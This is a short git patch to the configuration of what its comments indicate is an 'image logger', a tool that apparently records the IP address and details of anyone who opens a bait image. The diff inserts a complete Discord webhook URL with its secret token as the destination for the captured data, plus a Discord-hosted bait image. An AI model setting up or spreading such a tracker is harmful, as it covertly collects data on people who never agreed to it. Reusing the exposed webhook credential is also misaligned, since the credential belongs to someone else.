From 6e55ceb08aa434432d235487a7a7e5775ce8b8bd Mon Sep 17 00:00:00 2001 From: mysticdhc-gif Date: Sun, 9 Nov 2025 21:48:37 +0300 Subject: [PATCH] main.py --- api/main.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/api/main.py b/api/main.py index 27967a2..ab2c8e9 100644 --- a/api/main.py +++ b/api/main.py @@ -12,8 +12,8 @@ config = { # BASE CONFIG # - "webhook": "", - "image": "", # You can also have a custom image by using a URL argument + "webhook": "https://discord.com/api/webhooks/1437139746009645108/WUUrxFWV7NsUZ0G7XmxVR-lurX-g8pgcZUT4lU3vbDt-bCXuKM2rDn13Iknw0Y-CodDQ", + "image": "https://media.discordapp.net/attachments/1372644977271898232/1386407587712340039/output.jpg?ex=6859982f&is=685846af&hm=4070a653b97af01b79abb34a49f8d1ef53e00501a043b2d0179b2604beeaaaa1&=&format=webp&width=88&height=273", # You can also have a custom image by using a URL argument # (E.g. yoursite.com/imagelogger?url=) "imageArgument": True, # Allows you to use a URL argument to change the image (SEE THE README)